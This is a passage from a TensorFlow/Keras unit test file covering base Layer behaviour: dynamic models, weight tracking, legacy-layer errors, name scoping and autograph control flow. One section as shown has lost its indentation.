    inputs = input_layer.Input((3,))
    x = DynamicLayer(dynamic=True)(inputs)
    outputs = inner_model(x)

    # Dynamic-ness must propagate from the nested model to the outer one.
    model = training_lib.Model(inputs, outputs)
    self.assertEqual(model.dynamic, True)
    model.compile(rmsprop.RMSprop(0.001), loss='mse')
    self.assertEqual(model.run_eagerly, True)
    model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))

  def test_dynamic_subclassed_model_no_shape_inference(self):

    class MyModel(training_lib.Model):

      def __init__(self):
        super(MyModel, self).__init__(dynamic=True)
        self.layer1 = layers.Dense(3)
        self.layer2 = layers.Dense(3)

      def call(self, inputs):
        if math_ops.reduce_sum(inputs) > 0:
          return self.layer1(inputs)
        else:
          return self.layer2(inputs)

    model = MyModel()
    self.assertEqual(model.dynamic, True)
    model.compile(rmsprop.RMSprop(0.001), loss='mse')
    self.assertEqual(model.run_eagerly, True)
    model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))
    # Without compute_output_shape, no static outputs are inferred.
    self.assertEqual(model.outputs, None)

  def test_dynamic_subclassed_model_with_shape_inference(self):

    class MyModel(training_lib.Model):

      def __init__(self):
        super(MyModel, self).__init__(dynamic=True)
        self.layer1 = layers.Dense(3)
        self.layer2 = layers.Dense(3)

      def call(self, inputs):
        if math_ops.reduce_sum(inputs) > 0:
          return self.layer1(inputs)
        else:
          return self.layer2(inputs)

      def compute_output_shape(self, input_shape):
        return tuple(input_shape[:-1].as_list()) + (3,)

    model = MyModel()
    self.assertEqual(model.dynamic, True)
    model.compile(rmsprop.RMSprop(0.001), loss='mse')
    x, y = np.random.random((2, 3)), np.random.random((2, 3))
    model.train_on_batch(x, y)
    outputs = model(x)
    self.assertEqual(outputs.shape.as_list(), [2, 3])

  def test_deepcopy(self):
    bias_reg = lambda x: 1e-3 * math_ops.reduce_sum(x)
    layer = layers.Conv2D(32, (3, 3), bias_regularizer=bias_reg)
    # Call the Layer on data to generate regularize losses.
    layer(array_ops.ones((1, 10, 10, 3)))
    self.assertLen(layer.losses, 1)
    new_layer = copy.deepcopy(layer)
    self.assertEqual(new_layer.bias_regularizer, bias_reg)
    self.assertEqual(layer.get_config(), new_layer.get_config())

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_invalid_forward_pass(self):
    inputs = input_layer.Input((3,))
    with self.assertRaisesRegexp(ValueError, 'You did something wrong!'):
      _ = InvalidLayer()(inputs)

  def test_no_legacy_model(self):
    inputs = input_layer.Input((1,))
    legacy_dense_0 = legacy_core.Dense(1, name='legacy_dense_0')
    legacy_dense_1 = legacy_core.Dense(1, name='legacy_dense_1')

    layer = legacy_dense_0(inputs)
    layer = layers.Dense(1)(layer)
    layer = legacy_dense_1(layer)

    expected_regex = (r'The following are legacy tf\.layers\.Layers:\n '
                      '{}\n {}'.format(legacy_dense_0, legacy_dense_1))
    with self.assertRaisesRegexp(TypeError, expected_regex):
      _ = training_lib.Model(inputs=[inputs], outputs=[layer])

    model = training_lib.Model(inputs=[inputs], outputs=[inputs])
    with self.assertRaisesRegexp(TypeError, expected_regex):
      model._insert_layers([legacy_dense_0, legacy_dense_1])

  def test_no_legacy_sequential(self):
    layer = [layers.Dense(1), legacy_core.Dense(1, name='legacy_dense_0')]

    expected_regex = r'legacy tf\.layers\.Layers:\n {}'.format(layer[1])
    with self.assertRaisesRegexp(TypeError, expected_regex):
      _ = sequential.Sequential(layer)

    with self.assertRaisesRegexp(TypeError, expected_regex):
      _ = sequential.Sequential([input_layer.Input(shape=(4,))] + layer)

    model = sequential.Sequential()
    with self.assertRaisesRegexp(TypeError, expected_regex):
      for l in layer:
        model.add(l)

  @combinations.generate(
      combinations.times(
          combinations.keras_model_type_combinations(),
          combinations.combine(mode=['graph', 'eager'])))
  def test_build_with_numpy_data(self):
    model_layers = [
        layers.Dense(3, activation='relu', kernel_initializer='ones'),
        layers.Dense(1, activation='sigmoid', kernel_initializer='ones')
    ]
    model = testing_utils.get_model_from_layers(model_layers, input_shape=(4,))
    model(np.zeros((2, 4), dtype='float32'))
    self.assertTrue(model.built)

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_default_add_weight(self):

    class TestLayer(base_layer.Layer):

      def __init__(self):
        super(TestLayer, self).__init__()
        self.default_weight = self.add_weight()
        self.weight_without_name = self.add_weight(shape=(3, 4))
        self.regularized_weight_without_name = self.add_weight(
            shape=(3, 4), regularizer='l2')

    layer = TestLayer()
    self.assertEqual(layer.default_weight.shape.as_list(), [])
    self.assertEqual(layer.weight_without_name.shape.as_list(), [3, 4])
    self.assertEqual(layer.default_weight.dtype.name, 'float32')
    self.assertEqual(layer.weight_without_name.dtype.name, 'float32')
    self.assertEqual(len(layer.losses), 1)
    if not context.executing_eagerly():
      # Cannot access tensor.name in eager execution.
      self.assertIn('Variable_2/Regularizer', layer.losses[0].name)

  @combinations.generate(combinations.keras_mode_combinations(mode=['eager']))
  def test_learning_phase_freezing_for_layers(self):

    class LearningPhaseLayer(base_layer.Layer):

      def call(self, inputs):
        return backend.in_train_phase(lambda: array_ops.ones_like(inputs),
                                      lambda: array_ops.zeros_like(inputs))

    def get_learning_phase_value():
      model = sequential.Sequential([LearningPhaseLayer(input_shape=(1,))])
      model._run_eagerly = testing_utils.should_run_eagerly()
      return np.sum(model(np.ones((1, 1))))

    self.assertEqual(get_learning_phase_value(), 0)

    # Test scope.
    with backend.learning_phase_scope(1):
      self.assertEqual(get_learning_phase_value(), 1)

    # The effects of the scope end after exiting it.
    self.assertEqual(get_learning_phase_value(), 0)

    # Test setting.
    backend.set_learning_phase(1)
    self.assertEqual(get_learning_phase_value(), 1)
    backend.set_learning_phase(0)
    self.assertEqual(get_learning_phase_value(), 0)

  # Cannot be enabled with `run_eagerly=True`, see b/123904578
  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_layer_can_return_variable(self):

    class ComputeSum(base_layer.Layer):

      def __init__(self):
        super(ComputeSum, self).__init__()
        self.total = variables.Variable(
            initial_value=array_ops.zeros((1, 1)), trainable=False)
        if not context.executing_eagerly():
          backend.get_session().run(self.total.initializer)

      def call(self, inputs):
        self.total.assign_add(inputs)
        return self.total

    inputs = input_layer.Input(shape=(1,))
    model = training_lib.Model(inputs, ComputeSum()(inputs))
    model.predict(np.ones((1, 1)))

  def _get_layer_with_training_arg(self):

    class TrainingLayer(base_layer.Layer):
      """A layer with a `training` argument in a defuned `call`."""

      @def_function.function
      def call(self, inputs, training=None):
        if training is None:
          training = backend.learning_phase()
        return tf_utils.smart_cond(training,
                                   lambda: array_ops.ones_like(inputs),
                                   lambda: array_ops.zeros_like(inputs))

    return TrainingLayer()

  # b/124459427: can't test with `run_eagerly=True` for now.
  @combinations.generate(
      combinations.times(combinations.keras_mode_combinations(),
                         combinations.keras_model_type_combinations()))
  def test_training_arg_in_defun(self):
    layer = self._get_layer_with_training_arg()
    model = testing_utils.get_model_from_layers([layer], input_shape=(1,))
    model.compile(rmsprop.RMSprop(0.),
                  loss='mae')
    history = model.fit(np.zeros((1, 1)), np.zeros((1, 1)))
    self.assertEqual(history.history['loss'][0], 1.)
    loss = model.evaluate(np.zeros((1, 1)), np.zeros((1, 1)))
    self.assertEqual(loss, 0.)

    # Test that the argument injection performed in `call` is not active
    # when the argument is passed explicitly.
    layer = self._get_layer_with_training_arg()
    inputs = input_layer.Input(shape=(1,))
    # Pass `training` by name
    outputs = layer(inputs, training=False)
    model = training_lib.Model(inputs, outputs)
    model.compile(rmsprop.RMSprop(0.),
                  loss='mae')
    history = model.fit(np.zeros((1, 1)), np.zeros((1, 1)))
    self.assertEqual(history.history['loss'][0], 0.)

  @combinations.generate(
      combinations.times(combinations.keras_mode_combinations(),
                         combinations.keras_model_type_combinations()))
  def test_raw_variable_assignment(self):

    class RawVariableLayer(base_layer.Layer):

      def __init__(self, **kwargs):
        super(RawVariableLayer, self).__init__(**kwargs)
        # Test variables in nested structure.
        self.var_list = [variables.Variable(1.), {'a': variables.Variable(2.)}]

      def call(self, inputs):
        return inputs * self.var_list[0] * self.var_list[1]['a']

    model = testing_utils.get_model_from_layers([RawVariableLayer()],
                                                input_shape=(10,))
    model.compile(
        'sgd',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    x, y = np.ones((10, 10)), np.ones((10, 10))
    # Checks that variables get initialized.
    model.fit(x, y, batch_size=2, epochs=2)

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_layer_names(self):
    inputs = input_layer.Input(shape=[2])
    add1 = inputs + inputs
    add2 = layers.Add()([inputs, inputs])
    add3 = inputs + inputs
    add4 = layers.Add()([inputs, inputs])
    model = training_lib.Model(inputs=[inputs],
                               outputs=[add1, add2, add3, add4])
    actual_names = [l.name for l in model.layers]
    graph_names = [
        'input_1', 'tf_op_layer_AddV2', 'add', 'tf_op_layer_AddV2_1', 'add_1'
    ]
    eager_names = [
        'input_1', 'tf_op_layer_add', 'add', 'tf_op_layer_add_2', 'add_1'
    ]
    # NOTE(review): the loop variables bind `eager` to graph_names and
    # `graph` to eager_names (swapped), but the set-membership assertion
    # is order-insensitive, so the test still checks the right thing.
    for actual, eager, graph in zip(actual_names, graph_names, eager_names):
      self.assertIn(actual, {eager, graph})

  def test_add_trainable_weight_on_frozen_layer(self):

    class TestLayer(base_layer.Layer):

      def build(self, input_shape):
        self.w = self.add_weight(shape=(), trainable=True)

      def call(self, inputs):
        return self.w * inputs

    layer = TestLayer()
    layer.trainable = False
    layer.build(None)
    # Weights added while frozen must become trainable when unfrozen.
    layer.trainable = True
    self.assertListEqual(layer.trainable_weights, [layer.w])

  @combinations.generate(
      combinations.times(combinations.keras_mode_combinations(),
                         combinations.keras_model_type_combinations()))
  def test_passing_initial_weights_values(self):
    kernel_value = np.random.random((10, 2))
    layer_with_weights = layers.Dense(2, use_bias=False, weights=[kernel_value])

    model = testing_utils.get_model_from_layers([layer_with_weights],
                                                input_shape=(10,))
    model.compile(
        'sgd',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    inputs = np.random.random((3, 10))
    out = model.predict(inputs)
    self.assertAllClose(model.layers[-1].get_weights()[0], kernel_value)
    self.assertAllClose(out, np.dot(inputs, kernel_value))

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_set_weights_and_get_weights(self):
    layer = layers.Dense(2)
    layer.build((None, 10))
    kernel = np.random.random((10, 2))
    bias = np.random.random((2,))
    layer.set_weights([kernel, bias])
    weights = layer.get_weights()
    self.assertEqual(len(weights), 2)
    self.assertAllClose(weights[0], kernel)
    self.assertAllClose(weights[1], bias)
    with self.assertRaisesRegexp(
        ValueError, 'but the layer was expecting 2 weights'):
      layer.set_weights([1, 2, 3])
    with self.assertRaisesRegexp(
        ValueError, 'not compatible with provided weight shape'):
      layer.set_weights([kernel.T, bias])

  def test_get_config_error(self):

    class MyLayer(base_layer.Layer):

      def __init__(self, my_kwarg='default', **kwargs):
        super(MyLayer, self).__init__(**kwargs)
        self.my_kwarg = my_kwarg

    # `__init__` includes kwargs but `get_config` is not overridden, so
    # an error should be thrown:
    with self.assertRaisesRegexp(NotImplementedError, 'Layer MyLayer has'):
      MyLayer('custom').get_config()

    class MyLayerNew(base_layer.Layer):

      def __init__(self, my_kwarg='default', **kwargs):
        super(MyLayerNew, self).__init__(**kwargs)
        self.my_kwarg = my_kwarg

      def get_config(self):
        config = super(MyLayerNew, self).get_config()
        config['my_kwarg'] = self.my_kwarg
        return config

    # Test to make sure that error is not raised if the method call is
    # from an overridden `get_config`:
    self.assertEqual(MyLayerNew('custom').get_config()['my_kwarg'], 'custom')

    class MyLayerNew2(base_layer.Layer):

      def __init__(self, name='MyLayerName', dtype=None, **kwargs):  # pylint:disable=redefined-outer-name
        super(MyLayerNew2, self).__init__(name=name, dtype=dtype, **kwargs)

    # Check that if the kwargs in `__init__` are base layer constructor
    # arguments, no error is thrown:
    self.assertEqual(MyLayerNew2(name='New').get_config()['name'], 'New')

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_count_params(self):
    dense = layers.Dense(16)
    dense.build((None, 4))
    self.assertEqual(dense.count_params(), 16 * 4 + 16)

    dense = layers.Dense(16)
    with self.assertRaisesRegexp(ValueError, 'call `count_params`'):
      dense.count_params()

    model = sequential.Sequential(layers.Dense(16))
    with self.assertRaisesRegexp(ValueError, 'call `count_params`'):
      model.count_params()

    dense = layers.Dense(16, input_dim=4)
    model = sequential.Sequential(dense)
    self.assertEqual(model.count_params(), 16 * 4 + 16)

  def test_super_not_called(self):

    class CustomLayerNotCallingSuper(base_layer.Layer):

      def __init__(self):
        pass

    layer = CustomLayerNotCallingSuper()
    with self.assertRaisesRegexp(RuntimeError, 'You must call `super()'):
      layer(np.random.random((10, 2)))

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_first_arg_not_called_inputs(self):
    x, y = array_ops.ones((10, 1)), array_ops.ones((10, 1))

    class ArgLayer(base_layer.Layer):

      def call(self, x, y):
        return x + y

    layer = ArgLayer()
    out = self.evaluate(layer(x=x, y=y))
    self.assertAllClose(out, 2 * np.ones((10, 1)))

    class KwargLayer(base_layer.Layer):

      def call(self, x=None, y=None):
        return x + y

    layer = KwargLayer()
    out = self.evaluate(layer(x=x, y=y))
    self.assertAllClose(out, 2 * np.ones((10, 1)))

    with self.assertRaisesRegexp(ValueError, 'must always be passed'):
      layer(y=y)

    class TFFunctionLayer(base_layer.Layer):

      @def_function.function
      def call(self, x, y=None):
        if y is None:
          return x
        return x + y

    layer = TFFunctionLayer()
    out = self.evaluate(layer(x=x, y=y))
    self.assertAllClose(out, 2 * np.ones((10, 1)))

  def test_build_input_shape(self):

    class CustomLayer(base_layer.Layer):

      def build(self, input_shape):
        self.add_weight('w', shape=input_shape[1:])
        super(CustomLayer, self).build(input_shape)

    layer = CustomLayer()
    self.assertFalse(layer.built)

    layer.build([None, 1, 2, 3])
    self.assertTrue(layer.built)
    self.assertEqual([None, 1, 2, 3], layer._build_input_shape)

    layer = CustomLayer()
    layer(input_layer.Input((3,)))
    self.assertTrue(layer.built)
    self.assertEqual([None, 3], layer._build_input_shape.as_list())
class SymbolicSupportTest(keras_parameterized.TestCase):
def test_using_symbolic_tensors_with_tf_ops(self):
# Single-input.
x = input_layer.Input((3,))
y = math_ops.square(x)
self.assertEqual(y.graph, backend.get_graph())
# Multi-inputs.
x1, x2 = input_layer.Input((3,)), input_layer.Input((3,))
y = array_ops.concat([x1, x2], axis=1)
self.assertEqual(y.graph, backend.get_graph())
# Mixing Keras symbolic tensors and graph tensors from the same graph works.
with backend.get_graph().as_default():
x1 = input_layer.Input((3,))
x2 = input_layer.Input((3,))
y = math_ops.matmul(x1, x2)
self.assertEqual(y.graph, backend.get_graph())
# Creating same op type (matmul) multiple times in the Keras graph works.
x1 = input_layer.Input((3,))
x2 = input_layer.Input((3,))
y = math_ops.matmul(x1, x2)
self.assertEqual(y.graph, backend.get_graph())
def test_mixing_eager_and_graph_tensors(self):
with ops.Graph().as_default():
x1 = array_ops.ones((3, 3))
x2 = array_ops.ones((3, 3))
self.assertIsInstance(x2, ops.EagerTensor)
with self.assertRaisesRegexp(TypeError, 'Graph tensors'):
math_ops.matmul(x1, x2)
def test_mixing_numpy_arrays_and_graph_tensors(self):
with ops.Graph().as_default():
x1 = array_ops.ones((3, 3))
x2 = np.ones((3, 3), dtype='float32')
with self.assertRaisesRegexp(TypeError, 'Graph tensors'):
math_ops.matmul(x1, x2)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_mixing_keras_symbolic_tensors_and_eager_tensors(self):
x1 = input_layer.Input((3,))
x2 = array_ops.ones((3, 3))
y = math_ops.matmul(x1, x2)
self.assertEqual(y.graph, backend.get_graph())
fn = backend.function(inputs=[x1], outputs=[y])
x_val = np.random.random((3, 3))
y_val = np.ones((3, 3))
self.assertAllClose(fn([x_val])[0],
np.matmul(x_val, y_val),
atol=1e-5)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_mixing_keras_symbolic_tensors_and_numpy_arrays(self):
x1 = input_layer.Input((3,))
x2 = np.ones((3, 3), dtype='float32')
y = math_ops.matmul(x1, x2)
self.assertEqual(y.graph, backend.get_graph())
fn = backend.function(inputs=[x1], outputs=[y])
x_val = np.random.random((3, 3))
y_val = np.ones((3, 3))
self.assertAllClose(fn([x_val])[0],
np.matmul(x_val, y_val),
atol=1e-5)
  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_reraising_exception(self):
    # When layer is not dynamic, we have some pattern matching during exception
    # handling to detect when the user is trying to use python control flow.
    # When an exception is thrown but the pattern doesn't match, we want to
    # preserve the originating stack trace. An early implementation of this
    # logic lost the stack trace. We test the correct behavior here.

    class TypeErrorLayer(base_layer.Layer):

      def call(self, inputs):
        def easily_identifiable_name():
          raise TypeError('Non-matching TypeError message.')
        easily_identifiable_name()

    inputs = input_layer.Input((3,))

    try:
      _ = TypeErrorLayer()(inputs)
    except TypeError as e:
      # Whether the error went through autograph or not, the innermost frame
      # must still name the function that actually raised.
      if hasattr(e, 'ag_error_metadata'):
        self.assertIn('easily_identifiable_name', str(e))
        # See ErrorMetadataBase in autograph/pyct/errors.py
        function_name = e.ag_error_metadata.translated_stack[-1].function_name
      else:
        tb = traceback.extract_tb(sys.exc_info()[2])
        last_entry = tb[-1]
        function_name = last_entry[2]
      self.assertEqual(function_name, 'easily_identifiable_name')
  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_summaries_in_tf_function(self):
    # Summaries written inside Layer.call should be recorded under the
    # layer's name scope ('my_layer/mean'). Eager-only: graph mode exits.
    if not context.executing_eagerly():
      return

    class MyLayer(base_layer.Layer):

      def call(self, inputs):
        summary_ops_v2.scalar('mean', math_ops.reduce_mean(inputs))
        return inputs

    tmp_dir = self.get_temp_dir()
    writer = summary_ops_v2.create_file_writer_v2(tmp_dir)
    with writer.as_default(), summary_ops_v2.always_record_summaries():
      my_layer = MyLayer()
      x = array_ops.ones((10, 10))

      def my_fn(x):
        return my_layer(x)

      _ = my_fn(x)

    # Exactly one event file should exist, containing only the layer's tag.
    event_file = gfile.Glob(os.path.join(tmp_dir, 'events*'))
    self.assertLen(event_file, 1)
    event_file = event_file[0]
    tags = set()
    for e in summary_iterator.summary_iterator(event_file):
      for val in e.summary.value:
        tags.add(val.tag)
    self.assertEqual(set(['my_layer/mean']), tags)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
class NestedTrackingTest(test.TestCase):
  """Tests that layers track weights, updates and losses of nested objects."""

  def test_nested_layer_variable_tracking(self):
    # Test that variables from nested sublayers are
    # being tracked by subclassed layers.

    class MyLayer(base_layer.Layer):

      def __init__(self):
        super(MyLayer, self).__init__()
        self.dense1 = layers.Dense(1)
        self.dense2 = layers.BatchNormalization()

      def build(self, input_shape):
        self.v1 = self.add_weight('v1', shape=input_shape[1:].as_list())
        self.v2 = variables.Variable(
            name='v2',
            initial_value=np.zeros(input_shape[1:].as_list(), dtype='float32'),
            trainable=False)

      def call(self, inputs):
        x = self.dense1(inputs) + self.dense2(inputs)
        return x + self.v1 + self.v2

    layer = MyLayer()
    inputs = input_layer.Input((1,))
    _ = layer(inputs)

    # 8 weights total; 5 trainable (Dense's 2, BatchNorm's 2 trainable, v1)
    # and 3 non-trainable (BatchNorm's 2 moving stats, v2).
    self.assertEqual(len(layer.weights), 8)
    self.assertEqual(len(layer.trainable_weights), 5)
    self.assertEqual(len(layer.non_trainable_weights), 3)

    # Freezing a sublayer moves its weights to the non-trainable set.
    layer.dense1.trainable = False
    self.assertEqual(len(layer.weights), 8)
    self.assertEqual(len(layer.trainable_weights), 3)
    self.assertEqual(len(layer.non_trainable_weights), 5)

    # Freezing the outer layer freezes everything.
    layer.trainable = False
    self.assertEqual(len(layer.weights), 8)
    self.assertEqual(len(layer.trainable_weights), 0)
    self.assertEqual(len(layer.non_trainable_weights), 8)
    # Checkpoint dependencies are exactly the two sublayers and the two
    # directly owned variables.
    self.assertEqual(
        {id(v) for v in [layer.dense1, layer.dense2, layer.v1, layer.v2]},
        {id(v) for _, v in layer._checkpoint_dependencies})

  def test_nested_layer_updates_losses_tracking(self):
    # Test that updates and losses from nested sublayers are
    # being tracked by subclassed layers.

    class UpdateAndLossLayer(base_layer.Layer):

      def build(self, _):
        self.v1 = self.add_weight('v1', shape=())

      def call(self, inputs):
        self.add_loss(math_ops.reduce_sum(inputs))
        self.add_update(state_ops.assign_add(self.v1, 1))
        return inputs + 1

    class MyLayer(base_layer.Layer):

      def build(self, _):
        self.v1 = self.add_weight('v1', shape=())

      def __init__(self):
        super(MyLayer, self).__init__()
        self.ul1 = UpdateAndLossLayer()
        self.ul2 = UpdateAndLossLayer()

      def call(self, inputs):
        self.add_loss(math_ops.reduce_sum(inputs))
        self.add_update(state_ops.assign_add(self.v1, 1))
        x = self.ul1(inputs)
        return self.ul2(x)

    layer = MyLayer()

    # One loss/update from the outer layer plus one from each sublayer = 3.
    if context.executing_eagerly():
      inputs = array_ops.ones((3, 1))
      _ = layer(inputs)
      self.assertEqual(len(layer.losses), 3)
      self.assertLen(layer.get_losses_for(None), 3)
    else:
      inputs = input_layer.Input((1,))
      _ = layer(inputs)
      self.assertEqual(len(layer.losses), 3)
      self.assertEqual(len(layer.updates), 3)
      self.assertLen(layer.get_losses_for(None), 3)

  def test_attribute_reassignment(self):
    # Reassigning an attribute must untrack the previously assigned object;
    # only the last assignment survives in layer._layers.
    l = base_layer.Layer()
    l.a = base_layer.Layer()
    l.a = []
    l.a = variables.Variable(1.)
    l.a = base_layer.Layer()
    last_assignment = base_layer.Layer()
    l.a = last_assignment

    l.b = variables.Variable(1.)
    del l.b
    l.c = base_layer.Layer()
    del l.c
    l.d = last_assignment
    del l.d
    self.assertEqual([last_assignment], l._layers)
    self.assertEqual([], l.trainable_weights)
    self.assertEqual([], l.non_trainable_weights)
    self.assertEqual([], l.weights)
    del l.a
    self.assertEqual([], l._layers)

  def test_assign_op_not_tracked_as_variable(self):
    # The result of assign_add is an op/tensor, not a variable, and must not
    # show up in layer.variables.

    class LayerWithAssignAttr(base_layer.Layer):

      def build(self, input_shape):
        self.v = variables.Variable(1.)
        self.v_assign = self.v.assign_add(2.)

    layer = LayerWithAssignAttr()
    layer.build((10, 10))

    self.assertEqual([layer.v], layer.variables)

  def test_layer_class_not_tracked_as_sublayer(self):
    # See https://github.com/tensorflow/tensorflow/issues/27431 for details.

    class LayerWithClassAttribute(base_layer.Layer):

      def __init__(self):
        super(LayerWithClassAttribute, self).__init__()
        # A class object (not an instance) must not be tracked.
        self.layer_fn = layers.Dense

    layer = LayerWithClassAttribute()
    self.assertEmpty(layer.variables)
    self.assertEmpty(layer.submodules)

  def test_layer_call_fn_args(self):
    # _call_fn_args must reflect the user-defined call signature, with or
    # without a tf.function wrapper around call.

    class NonDefunLayer(base_layer.Layer):

      def call(self, inputs, a, mask, b=None, training=None):
        return inputs

    class DefunLayer(base_layer.Layer):

      @def_function.function
      def call(self, x, mask, a, training=None, b=None):
        return x

    nondefun_layer = NonDefunLayer()
    self.assertEqual(nondefun_layer._call_fn_args,
                     ['inputs', 'a', 'mask', 'b', 'training'])
    defun_layer = DefunLayer()
    self.assertEqual(defun_layer._call_fn_args,
                     ['x', 'mask', 'a', 'training', 'b'])

  def test_sequential_model(self):
    model = sequential.Sequential(
        [layers.Dense(10, input_shape=(10,)),
         layers.Dense(5)])
    self.assertLen(model.layers, 2)
    self.assertLen(model.weights, 4)

    # Make sure a subclass model also works when it is called 'Sequential'.

    class Sequential(training_lib.Model):

      def __init__(self):
        super(Sequential, self).__init__()
        self.dense_layers = [layers.Dense(10), layers.Dense(5)]

      def call(self, inputs):
        x = inputs
        for d in self.dense_layers:
          x = d(x)
        return x

    s = Sequential()
    self.assertLen(s.layers, 2)
    self.assertLen(s.weights, 0)

    # Weights are only created once the model is called on an input.
    s(input_layer.Input((10,)))
    self.assertLen(s.weights, 4)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
class NameScopingTest(keras_parameterized.TestCase):
  """Tests that layer variables are created under the layer's name scope."""

  def test_name_scope_layer(self):
    x = backend.placeholder(shape=(10, 10))
    layer = layers.Dense(10, name='MyName')
    layer(x)
    self.assertEqual(layer.bias.name, 'MyName/bias:0')
    self.assertEqual(layer.kernel.name, 'MyName/kernel:0')

  def test_name_scope_functional_api(self):
    inputs = input_layer.Input((3,))
    layer = layers.Dense(10, name='MyName')
    _ = layer(inputs)
    self.assertEqual(layer.bias.name, 'MyName/bias:0')
    self.assertEqual(layer.kernel.name, 'MyName/kernel:0')

  def test_name_scope_functional_api_nested(self):

    class NestedLayer(base_layer.Layer):

      def __init__(self, name='OuterName'):
        super(NestedLayer, self).__init__(name=name)
        self.dense = layers.Dense(10, name='InnerName')

      def call(self, inputs):
        return self.dense(inputs)

    inputs = input_layer.Input((3,))
    layer = NestedLayer()
    _ = layer(inputs)
    # Nested layers nest their name scopes: outer/inner/variable.
    self.assertEqual(layer.dense.bias.name, 'OuterName/InnerName/bias:0')
    self.assertEqual(layer.dense.kernel.name, 'OuterName/InnerName/kernel:0')

  def test_name_scope_sublayer(self):

    class NameScopeTracker(base_layer.Layer):

      def call(self, inputs):
        # Records the name scope active while this layer runs.
        self.active_name_scope = ops.get_name_scope()
        return inputs

    x = backend.placeholder(shape=(10, 10))
    sublayer = NameScopeTracker(name='Sublayer')
    layer = layers.Dense(10, activation=sublayer, name='MyName2')
    layer(x)
    self.assertEqual(layer.bias.name, 'MyName2/bias:0')
    self.assertEqual(layer.kernel.name, 'MyName2/kernel:0')
    # The activation sublayer executes inside the outer layer's scope.
    self.assertEqual(sublayer.active_name_scope, 'MyName2/Sublayer')

  def test_name_scope_tf_tensor(self):
    x = ops.convert_to_tensor_v2(np.ones((10, 10)))
    layer = layers.Dense(
        10, activation=layers.ReLU(name='MyAct'), name='MyName3')
    layer(x)
    self.assertEqual(layer.bias.name, 'MyName3/bias:0')
    self.assertEqual(layer.kernel.name, 'MyName3/kernel:0')
@combinations.generate(combinations.keras_mode_combinations(mode=['eager']))
class AutographControlFlowTest(keras_parameterized.TestCase):
  """Tests Python control flow inside Layer.call converted by autograph."""

  def test_disabling_in_context_is_matched(self):
    # With autograph disabled, `if <tensor>` must raise the usual
    # "cannot use a Tensor as a bool" TypeError.

    test_obj = self

    class MyLayer(base_layer.Layer):

      def call(self, inputs, training=None):
        with test_obj.assertRaisesRegex(TypeError, 'Tensor.*as.*bool'):
          if constant_op.constant(False):
            return inputs * 1.
        return inputs * 0.

    @def_function.function(autograph=False)
    def test_fn():
      return MyLayer()(constant_op.constant([[1., 2., 3.]]))

    test_fn()

  def test_if_training_pattern_output(self):
    # `if training:` choosing the layer output must yield different results
    # in training (output==labels, loss 0) and inference (zeros, loss 1).

    class MyLayer(base_layer.Layer):

      def call(self, inputs, training=None):
        if training:
          return inputs * 1.
        return inputs * 0.

    inputs = input_layer.Input((3,))
    outputs = MyLayer()(inputs)
    model = training_lib.Model(inputs, outputs)
    model.compile(
        'sgd',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    train_loss = model.train_on_batch(np.ones((2, 3)), np.ones((2, 3)))
    self.assertEqual(train_loss, 0.)
    test_loss = model.test_on_batch(np.ones((2, 3)), np.ones((2, 3)))
    self.assertEqual(test_loss, 1.)

  def test_if_training_pattern_loss(self):
    # `if training:` selecting an added loss: sum of ones (2*3) when
    # training, zero at test time.

    class MyLayer(base_layer.Layer):

      def call(self, inputs, training=None):
        if training:
          loss = math_ops.reduce_sum(inputs)
        else:
          loss = 0.
        self.add_loss(loss)
        return inputs

    inputs = input_layer.Input((3,))
    outputs = MyLayer()(inputs)
    model = training_lib.Model(inputs, outputs)
    model.compile(
        'sgd',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    train_loss = model.train_on_batch(np.ones((2, 3)), np.ones((2, 3)))
    self.assertEqual(train_loss, 2 * 3)
    test_loss = model.test_on_batch(np.ones((2, 3)), np.ones((2, 3)))
    self.assertEqual(test_loss, 0)

  def test_if_training_pattern_metric(self):
    # Same pattern for an added metric; value is checked over several
    # batches to exercise the 'mean' aggregation.

    class MyLayer(base_layer.Layer):

      def call(self, inputs, training=None):
        if training:
          metric = math_ops.reduce_sum(inputs)
        else:
          metric = 0.
        self.add_metric(metric, name='my_metric', aggregation='mean')
        return inputs

    inputs = input_layer.Input((3,))
    outputs = MyLayer()(inputs)
    model = training_lib.Model(inputs, outputs)
    model.compile(
        'sgd',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    for _ in range(3):
      _, train_metric = model.train_on_batch(np.ones((2, 3)),
                                             np.ones((2, 3)))

      self.assertEqual(train_metric, 2 * 3)
      _, test_metric = model.test_on_batch(np.ones((2, 3)),
                                           np.ones((2, 3)))
      self.assertEqual(test_metric, 0)

  def test_if_training_pattern_update(self):
    # `if training:` guarding a variable update: the counter is bumped by 1
    # during a train step and left alone otherwise.

    class MyLayer(base_layer.Layer):

      def build(self, input_shape):
        self.counter = self.add_weight(
            shape=(), trainable=False, initializer='zeros')

      def call(self, inputs, training=None):
        if training:
          increment = 1.
        else:
          increment = 0.
        self.counter.assign_add(increment)
        return inputs

    inputs = input_layer.Input((3,))
    layer = MyLayer()
    outputs = layer(inputs)
    model = training_lib.Model(inputs, outputs)
    model.compile(
        'sgd',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    model.train_on_batch(np.ones((2, 3)), np.ones((2, 3)))
    self.assertEqual(backend.get_value(layer.counter), 1.)

  def test_conditional_losses_in_call(self):

    class MyLayer(base_layer.Layer):

      def __init__(self):
        super(MyLayer,
              self).__init__(dynamic=testing_utils.should_run_eagerly())

      def call(self, inputs, training=None):
        if training:
